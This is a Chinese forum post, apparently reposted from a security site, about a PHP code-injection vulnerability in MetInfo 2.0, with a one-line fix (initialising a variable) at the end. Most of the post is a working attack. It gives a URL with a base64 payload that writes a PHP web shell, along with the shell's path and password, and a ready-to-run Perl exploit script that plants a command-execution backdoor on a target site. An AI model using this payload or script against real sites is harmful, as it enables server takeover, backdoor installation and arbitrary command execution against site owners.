找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 928|回复: 1

MetInfo 2.0 PHP代码注入漏洞及修复,转自新世纪网安基地

[复制链接]

70

主题

28

回帖

199

牛毛

一级牛人

积分
199
发表于 2011-9-3 18:11:47 | 显示全部楼层 |阅读模式 来自 山东省济南市
影响版本:
MetInfo 2.0
漏洞描述:
MetInfo企业网站管理系统是一个功能完善的营销型企业网站管理平台,PHP+MYSQL架构
MetInfo 2.0的/include/common.inc.php文件第132行:
eval(base64_decode($class2_all_1[0]));
$class2_all_1[0]变量未初始化,因此我们可以控制其值,进行代码注入的利用。
<*参考
www.linux520.com
*>

测试
http://victim.com/include/common.inc.php?$class2_all_1[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/
cGhwIGV2YWwoJF9QT1NUW2NdKTs/PicpOw==
base64编码部分为:fputs(fopen('../templates/test.php','w+'),'<?php eval($_POST[c]);?>');
一句话后门地址:http://victim.com/templates/test.php 密码 c
====
#!/usr/bin/env perl

use LWP::UserAgent;
print "################################################################\n";
print "#              MetInfo 2.0 c0de inj3cti0n 3xplo!t              #\n";
print "#                         by:linux520.com                      #\n";
print "################################################################\n";

die "Usage: $0 <target site> Ex:$0 victim.com\n" unless($ARGV[0]);
my $victim = $ARGV[0];
$user_agent = new LWP::UserAgent;
$vul_request = new HTTP::Request('GET',"http://$victim/include/common.inc.php?$class2_all_1[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw/
cGhwIHBhc3N0aHJ1KCRfR0VUW2NtZF0pPz4nKTs=");
# fputs(fopen('../templates/test.php','w+'),'<?php passthru($_GET[cmd]);?>');
$user_agent->request($vul_request);
$response = $user_agent->request(new HTTP::Request('GET',"http://$victim/templates/test.php"));
if($response->is_success)
{
    print "code injection successful ! plz look at http://$victim/templates/test.php?cmd=id";
}
else
{
print "could not connect to $victim";
}
#############################################
临时解决方案:
对$class2_all_1[0]变量进行初始化

0

主题

3

回帖

6

牛毛

初生牛犊

嘉善川田

积分
9
发表于 2011-9-7 15:00:27 | 显示全部楼层 来自 浙江省嘉兴市
已经看过啦。。。。。。
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-25 05:57 , Processed in 0.156809 second(s), 38 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表